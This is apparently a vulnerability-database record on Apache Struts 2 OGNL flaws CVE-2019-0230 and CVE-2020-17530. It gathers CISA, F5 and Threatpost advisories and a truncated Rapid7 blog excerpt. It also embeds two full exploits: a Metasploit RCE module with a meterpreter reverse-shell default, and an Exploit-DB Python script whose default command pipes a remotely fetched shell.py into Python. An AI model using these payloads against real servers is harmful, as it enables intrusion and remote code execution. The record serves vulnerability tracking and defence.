"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:06:45", "description": "The Apache Software Foundation has released a security advisory to address vulnerabilities in Struts in the version range 2.0.0\u20142.5.20. An attacker could exploit one of these vulnerabilities to take control of an affected system. The current version, Struts 2.5.22, is not affected.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Apache\u2019s security advisory for [CVE-2019-0230 and CVE-2019-0233](<http://mail-archives.us.apache.org/mod_mbox/www-announce/202008.mbox/%3C66006167-999e-a1e5-4a3a-5f1c75a1e8a2%40apache.org%3E>) and upgrade to the appropriate version.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/08/14/apache-releases-security-advisory-struts-2>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-14T00:00:00", "type": "cisa", "title": "Apache Releases Security Advisory for Struts 2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-08-14T00:00:00", "id": "CISA:3D9E69A26C68866B64ED6E4B31E270E6", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/08/14/apache-releases-security-advisory-struts-2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-11-03T06:46:29", "description": "The Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags attributes such as id. It is therefore possible to pass in a value to Struts that will be evaluated again when a tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). This vulnerability is application dependant. A server side template must make an affected use of request data to render an HTML tag attribute.\n", "cvss3": {}, "published": "2020-12-16T00:17:35", "type": "metasploit", "title": "Apache Struts 2 Forced Multi OGNL Evaluation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2020-17530"], "modified": "2021-08-27T16:19:43", "id": "MSF:EXPLOIT-MULTI-HTTP-STRUTS2_MULTI_EVAL_OGNL-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/struts2_multi_eval_ognl/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache Struts 2 Forced Multi OGNL Evaluation',\n 'Description' => %q{\n The Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags\n attributes such as id. It is therefore possible to pass in a value to Struts that will be evaluated again when a\n tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).\n\n This vulnerability is application dependant. A server side template must make an affected use of request data to\n render an HTML tag attribute.\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Matthias Kaiser', # discovery of CVE-2019-0230\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2020-17530\n 'ka1n4t', # PoC of CVE-2020-17530\n ],\n 'References' => [\n ['CVE', '2019-0230'],\n ['CVE', '2020-17530'],\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-059'],\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-061'],\n ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-059'],\n ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-061'],\n ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2'],\n ['URL', 'https://github.com/ka1n4t/CVE-2020-17530'],\n ],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DisclosureDate' => '2020-09-14', # CVE-2019-0230 NVD publication date\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE, ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ]\n },\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\n OptString.new('NAME', [ true, 'The HTTP query parameter or form data name', 'id']),\n OptEnum.new('CVE', [ true, 'Vulnerability to use', 'CVE-2020-17530', ['CVE-2020-17530', 'CVE-2019-0230']])\n ])\n register_advanced_options([\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),\n OptString.new('HttpCookie', [false, 'An optional cookie to include when making the HTTP request'])\n ])\n end\n\n def check\n num1 = rand(1000..9999)\n num2 = rand(1000..9999)\n\n res = send_request_cgi(build_http_request(datastore['CVE'], \"#{num1}*#{num2}\"))\n if res.nil?\n return CheckCode::Unknown\n elsif res.body.scan(/([\"'])\\s*#{(num1 * num2)}\\s*\\1/).empty?\n return CheckCode::Safe\n end\n\n return CheckCode::Appears\n end\n\n def exploit\n cve = datastore['CVE']\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']} using #{cve}\")\n\n if cve == 'CVE-2019-0230'\n ognl = []\n ognl << '#context=#attr[\\'struts.valueStack\\'].context'\n ognl << '#container=#context[\\'com.opensymphony.xwork2.ActionContext.container\\']'\n ognl << '#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)'\n ognl << '#ognlUtil.setExcludedClasses(\\'\\')'\n ognl << '#ognlUtil.setExcludedPackageNames(\\'\\')'\n res = send_request_cgi(build_http_request(cve, ognl))\n fail_with(Failure::UnexpectedReply, 'Failed to execute the OGNL preamble') unless res&.code == 200\n end\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded, { cve: cve })\n when :linux_dropper\n execute_cmdstager({ cve: cve, delay: datastore['CMDSTAGER::DELAY'], linemax: 512 })\n end\n end\n\n def execute_command(cmd, opts = {})\n send_request_cgi(build_http_request(opts[:cve], build_ognl(opts[:cve], cmd)), 5)\n end\n\n def build_http_request(cve, ognl)\n ognl = ognl.map { |part| \"(#{part})\" }.join('.') if ognl.is_a? Array\n\n http_request_parameters = { 'uri' => normalize_uri(target_uri.path) }\n http_request_parameters['cookie'] = datastore['HttpCookie'] unless datastore['HttpCookie'].blank?\n if cve == 'CVE-2019-0230'\n http_request_parameters['method'] = 'GET'\n http_request_parameters['vars_get'] = { datastore['NAME'] => \"%{#{ognl}}\" }\n elsif cve == 'CVE-2020-17530'\n http_request_parameters['method'] = 'POST'\n http_request_parameters['vars_post'] = { datastore['NAME'] => \"%{#{ognl}}\" }\n end\n http_request_parameters\n end\n\n def build_ognl(cve, cmd)\n cmd = \"bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash\"\n ognl = []\n if cve == 'CVE-2019-0230'\n ognl << '#context=#attr[\\'struts.valueStack\\'].context'\n ognl << '#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)'\n ognl << \"@java.lang.Runtime@getRuntime().exec(\\\"#{cmd}\\\")\"\n elsif cve == 'CVE-2020-17530'\n ognl << '#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]'\n ognl << '#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]'\n ognl << '#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")'\n ognl << '#bean.setBean(#stack)'\n ognl << '#context=#bean.get(\"context\")'\n ognl << '#bean.setBean(#context)'\n ognl << '#macc=#bean.get(\"memberAccess\")'\n ognl << '#bean.setBean(#macc)'\n ognl << '#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")'\n ognl << '#bean.put(\"excludedClasses\",#emptyset)'\n ognl << '#bean.put(\"excludedPackageNames\",#emptyset)'\n ognl << '#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")'\n ognl << \"#execute.exec({\\\"#{cmd}\\\"})\"\n end\n\n ognl\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts2_multi_eval_ognl.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2023-12-07T15:42:11", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-17T00:00:00", "type": "exploitdb", "title": "Apache Struts 2.5.20 - Double OGNL evaluation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-0230", "CVE-2019-0230", "CVE-2020-0230"], "modified": "2020-11-17T00:00:00", "id": "EDB-ID:49068", "href": "https://www.exploit-db.com/exploits/49068", "sourceData": "# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation\r\n# Date: 08/18/2020\r\n# Exploit Author: West Shepherd\r\n# Vendor Homepage: https://struts.apache.org/download.cgi\r\n# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059)\r\n# CVE : CVE-2019-0230\r\n# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF.\r\n# Source(s):\r\n# https://github.com/PrinceFPF/CVE-2019-0230\r\n# https://cwiki.apache.org/confluence/display/WW/S2-059\r\n# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22\r\n\r\n# !/usr/bin/python\r\nfrom sys import argv, exit, stdout, stderr\r\nimport argparse\r\nimport requests\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nimport logging\r\n\r\n\r\nclass Exploit:\r\n def __init__(\r\n self,\r\n target='',\r\n redirect=False,\r\n proxy_address=''\r\n ):\r\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n self.target = target\r\n self.session = requests.session()\r\n self.redirect = redirect\r\n self.timeout = 0.5\r\n self.proxies = {\r\n 'http': 'http://%s' % proxy_address,\r\n 'https': 'http://%s' % proxy_address\r\n } \\\r\n if proxy_address is not None \\\r\n and proxy_address != '' else {}\r\n self.query_params = {}\r\n self.form_values = {}\r\n self.cookies = {}\r\n boundary = \"---------------------------735323031399963166993862150\"\r\n self.headers = {\r\n 'Content-Type': 'multipart/form-data; boundary=%s' % boundary,\r\n 'Accept': '*/*',\r\n 'Connection': 'close'\r\n }\r\n payload = \"%{(#nike='multipart/form-data').\" \\\r\n \"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\" \\\r\n \"(#_memberAccess?(#_memberAccess=#dm):\" \\\r\n\r\n\"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\"\r\n\\\r\n\r\n\"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\"\r\n\\\r\n \"(#ognlUtil.getExcludedPackageNames().clear()).\" \\\r\n \"(#ognlUtil.getExcludedClasses().clear()).\" \\\r\n \"(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}').\" \\\r\n\r\n\"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).\"\r\n\\\r\n\r\n\"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).\" \\\r\n \"(#p=new\r\njava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).\" \\\r\n\r\n\"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\"\r\n\\\r\n\r\n\"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).\"\r\n\\\r\n \"(#ros.flush())}\"\r\n\r\n self.payload = \"--%s\\r\\nContent-Disposition: form-data;\r\nname=\\\"foo\\\"; \" \\\r\n \"filename=\\\"%s\\0b\\\"\\r\\nContent-Type:\r\ntext/plain\\r\\n\\r\\nx\\r\\n--%s--\\r\\n\\r\\n\" % (\r\n boundary, payload, boundary\r\n )\r\n\r\n def do_get(self, url, params=None, data=None):\r\n return self.session.get(\r\n url=url,\r\n verify=False,\r\n allow_redirects=self.redirect,\r\n headers=self.headers,\r\n cookies=self.cookies,\r\n proxies=self.proxies,\r\n data=data,\r\n params=params\r\n )\r\n\r\n def do_post(self, url, data=None, params=None):\r\n return self.session.post(\r\n url=url,\r\n data=data,\r\n verify=False,\r\n allow_redirects=self.redirect,\r\n headers=self.headers,\r\n cookies=self.cookies,\r\n proxies=self.proxies,\r\n params=params\r\n )\r\n\r\n def debug(self):\r\n try:\r\n import http.client as http_client\r\n except ImportError:\r\n import httplib as http_client\r\n http_client.HTTPConnection.debuglevel = 1\r\n logging.basicConfig()\r\n logging.getLogger().setLevel(logging.DEBUG)\r\n requests_log = logging.getLogger(\"requests.packages.urllib3\")\r\n requests_log.setLevel(logging.DEBUG)\r\n requests_log.propagate = True\r\n return self\r\n\r\n def send_payload(self, command='curl --insecure -sv\r\nhttps://10.10.10.10/shell.py|python -'):\r\n url = self.target\r\n stdout.write('sending payload to %s payload %s' % (url, command))\r\n resp = self.do_post(url=url, params=self.query_params,\r\ndata=self.payload.replace('{COMMAND}', command))\r\n return resp\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(add_help=True,\r\n description='CVE-2020-0230 Struts\r\n2 exploit')\r\n try:\r\n parser.add_argument('-target', action='store', help='Target\r\naddress: http(s)://target.com/index.action')\r\n parser.add_argument('-command', action='store',\r\n help='Command to execute: touch /tmp/pwn')\r\n parser.add_argument('-debug', action='store', default=False,\r\nhelp='Enable debugging: False')\r\n parser.add_argument('-proxy', action='store', default='',\r\nhelp='Enable proxy: 10.10.10.10:8080')\r\n\r\n if len(argv) == 1:\r\n parser.print_help()\r\n exit(1)\r\n options = parser.parse_args()\r\n\r\n exp = Exploit(\r\n proxy_address=options.proxy,\r\n target=options.target\r\n )\r\n\r\n if options.debug:\r\n exp.debug()\r\n stdout.write('target %s debug %s proxy %s\\n' % (\r\n options.target, options.debug, options.proxy\r\n ))\r\n\r\n result = exp.send_payload(command=options.command)\r\n stdout.write('Response: %d\\n' % result.status_code)\r\n\r\n except Exception as error:\r\n\r\nstderr.write('error in main %s' % str(error))", "sourceHref": "https://www.exploit-db.com/raw/49068", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-10-14T22:21:14", "description": "Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as [CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.\n\nStruts 2 is an open-source coding framework and library for enterprise developers popular with developers and companies when creating Java-based applications. Both the exploitable vulnerabilities in question were fixed last November. \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>) \nResearchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).\n\n## **PoC Released to GitHub**\n\nThe proof-of-concept (PoC) [released this week ](<https://github.com/cellanu/cve-2019-0230>)raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends a malicious Object-Graph Navigation Language (OGNL) expressions that can then open the door for a remote code-execution attack, according to the security bulletin. OGNL is a Java language that can let attackers access data objects, and then use them to create and inject server-side code.\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,\u201d according to a bulletin issued Friday by the Multi-State Information Sharing & Analysis Center at the Center for Internet Security.\n\nWhile the PoC attack and exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch for the DoS bug (CVE-2019-0233). The vulnerability affects the write permissions of file directories that could lead to conditions ripe for a DoS attack.\n\nAccording to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Strut\u2019s Action that exposes the file.\n\n\u201cAn attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container\u2019s temp directory to read only, such that subsequent upload actions will fail,\u201d [according the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).\n\nThe Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests security teams verify no unauthorized system modifications have occurred on the system before applying the patch, and they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.\n\n**_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary [Threatpost eBook](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>), 2020 in Security: Four Stories from the New Threat Landscape, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. [Click here to download our eBook now](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)._**\n", "cvss3": {}, "published": "2020-08-14T21:20:01", "type": "threatpost", "title": "PoC Exploit Targeting Apache Struts Surfaces on GitHub", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"], "modified": "2020-08-14T21:20:01", "id": "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "href": "https://threatpost.com/poc-exploit-github-apache-struts/158393/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2023-02-08T16:15:37", "description": " * [CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \nForced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.\n * [CVE-2021-31805](<https://vulners.com/cve/CVE-2021-31805>) \nThe fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag's attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n\nImpact\n\nUsing a forced Object-Graph Navigation Language (OGNL) evaluation on untrusted user input allows an attacker to perform remote code execution leading to security degradation.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-22T01:45:00", "type": "f5", "title": "Apache Struts vulnerabilities CVE-2020-17530 and CVE-2021-31805", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-04-15T23:18:00", "id": "F5:K24608264", "href": "https://support.f5.com/csp/article/K24608264", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-01-08T22:48:37", "description": "## Struts2 Multi Eval OGNL RCE\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/01/metasploit-ascii-1.png)\n\nOur very own [zeroSteiner](<https://github.com/zeroSteiner>) added [`exploit/multi/http/struts2_multi_eval_ognl`](<https://github.com/rapid7/metasploit-framework/pull/14521>), which exploits Struts2 evaluating OGNL expressions in HTML attributes multiple times ([CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>) and [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>)). The [CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>) OGNL chain for remote code execution requires a one-time chain to enable the RCE gadget, which is handled automatically by the module. The OGNL gadget chain for [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>) will echo the command output. Both chains use a simple mathematical expression to ensure that evaluation occurs. These vulnerabilities are application dependent, and the user does need to know which CVE they are targeting. Setting the `NAME` parameter appropriately and using the check method to ensure evaluation takes place inside an HTML attribute are key to successful exploitation.\n\n## JuicyPotato-like Windows privilege escalation exploit\n\nExploit module [`exploits/windows/local/bits_ntlm_token_impersonation`](<https://github.com/rapid7/metasploit-framework/pull/14046>) was added by Metasploit contributor [C4ssandre](<https://github.com/C4ssandre>). It exploits BITS connecting to a local Windows Remote Management server (WinRM) at startup time. A fake WinRM server listening on port `5985` is started by a `DLL` loaded from a previous unprivileged meterpreter session. The fake server triggers BITS and then steals a `SYSTEM` token from the subsequent authentication request. The token is then used to start a new process and launch `powershell.exe` as the `SYSTEM` user. It downloads a malicious PowerShell script and executes it on a second local HTTP server, not writing any files to disk. The exploit is based on [decoder's PoC](<https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/>). It has been successfully tested on Windows 10 (10.0 Build 19041) 32 bits.\n\n## Pulse Connect Secure Gzip RCE\n\nMetasploit contributor [h00die](<https://github.com/h00die>) added an [exploit](<https://github.com/rapid7/metasploit-framework/pull/14368>) that targets Pulse Connect Secure server version `9.1R8` and earlier. The vulnerability was originally discovered by the [NCC Group](<https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-gzip-extraction-cve-2020-8260/>). It achieves authenticated remote code execution as `root` by uploading an encrypted config that contains an overwrite for a Perl template file. This module was made possible by [rxwx](<https://github.com/rxrx>), who shared the encryption code with the author. Admin credentials are required for successful `root` access. The module has been tested against server version `9.1R8`.\n\n## New modules (8)\n\n * [SpamTitan Unauthenticated RCE](<https://github.com/rapid7/metasploit-framework/pull/14330>) by [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) and [Felipe Molina](<https://github.com/felmoltor>), which exploits [CVE-2020-11698](<https://attackerkb.com/topics/ZM17ZOD4ym/cve-2020-11698?referrer=blog>)\n * [Pulse Secure VPN gzip RCE](<https://github.com/rapid7/metasploit-framework/pull/14368>) by [David Cash](<https://research.nccgroup.com/author/dcashncc/>), [Richard Warren](<https://uk.linkedin.com/in/rich-warren-437a7841>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [h00die](<https://github.com/h00die>), which exploits [CVE-2020-8260](<https://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=blog>)\n * [Apache Struts 2 Forced Multi OGNL Evaluation](<https://github.com/rapid7/metasploit-framework/pull/14521>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>), Matthias Kaiser, [Spencer McIntyre](<https://github.com/zeroSteiner>), and [ka1n4t](<https://github.com/ka1n4t>), which exploits [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>) and [CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>)\n * [SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.](<https://github.com/rapid7/metasploit-framework/pull/14046>) by Andrea Pierini ([decoder](<https://github.com/decoder>)), Antonio Cocomazzi (splinter_code), [Cassandre](<https://github.com/C4ssandre>), and Roberto ([0xea31](<https://github.com/0xea31>))\n * [Shodan Host Port](<https://github.com/rapid7/metasploit-framework/pull/14429>) by [natto97](<https://github.com/natto97>)\n * [WordPress Duplicator File Read Vulnerability](<https://github.com/rapid7/metasploit-framework/pull/14497>) by Hoa Nguyen - SunCSR Team and Ramuel Gall, which exploits [CVE-2020-11738](<https://attackerkb.com/topics/judia21wRt/cve-2020-11738?referrer=blog>)\n * [WordPress Easy WP SMTP Password Reset](<https://github.com/rapid7/metasploit-framework/pull/14474>) by [h00die](<https://github.com/h00die>), which exploits [CVE-2020-35234](<https://attackerkb.com/topics/12eb7VUXHR/cve-2020-35234?referrer=blog>)\n * [WordPress Total Upkeep Unauthenticated Backup Downloader](<https://github.com/rapid7/metasploit-framework/pull/14568>) by Wadeek and [h00die](<https://github.com/h00die>)\n\n## Enhancements and features\n\n * PR [14566](<https://github.com/rapid7/metasploit-framework/pull/14566>) from [zeroSteiner](<https://github.com/zeroSteiner>) Module `auxiliary/server/socks_proxy` replaces `modules/auxiliary/server/socks4a.rb` and `modules/auxiliary/server/socks5.rb`.\n * PR [14538](<https://github.com/rapid7/metasploit-framework/pull/14538>) from [jmartin-r7](<https://github.com/jmartin-r7>) Improves Metasploit's XML importer error messages when data is not Base64 encoded.\n * PR [14528](<https://github.com/rapid7/metasploit-framework/pull/14528>) from [zeroSteiner](<https://github.com/zeroSteiner>) Clarifies Windows Meterpreter payloads description support of XP SP2 or newer.\n * PR [14522](<https://github.com/rapid7/metasploit-framework/pull/14522>) from [axxop](<https://github.com/axxop>) Replaces the hardcoded default Shiro encryption key with a new datastore option that allows users to specify rememberMe cookie encryption key.\n * PR [14517](<https://github.com/rapid7/metasploit-framework/pull/14517>) from [timwr](<https://github.com/timwr>) Changes the osx/x64/shell_reverse_tcp payload to be generated with Metasm and captures and sends STDERR to msfconsole.\n * PR [14509](<https://github.com/rapid7/metasploit-framework/pull/14509>) from [egypt](<https://github.com/egypt>) This adds a Java target to the Apache Solr RCE exploit module and fixes several payload issues.\n * PR [14444](<https://github.com/rapid7/metasploit-framework/pull/14444>) from [dwelch-r7](<https://github.com/dwelch-r7>) Adds a couple of missing methods from the remote data services for adding and deleting routes.\n\n## Bugs fixed\n\n * PR [14589](<https://github.com/rapid7/metasploit-framework/pull/14589>) from [timwr](<https://github.com/timwr>) Fixes a file download issue with the Android Meterpreter's download command.\n * PR [14532](<https://github.com/rapid7/metasploit-framework/pull/14532>) from [bcoles](<https://github.com/bcoles>) Fixes a NoMethodError exception caused by the Msf::Post::Common mixin not being included in post/android/capture/screen.\n * PR [14530](<https://github.com/rapid7/metasploit-framework/pull/14530>) from 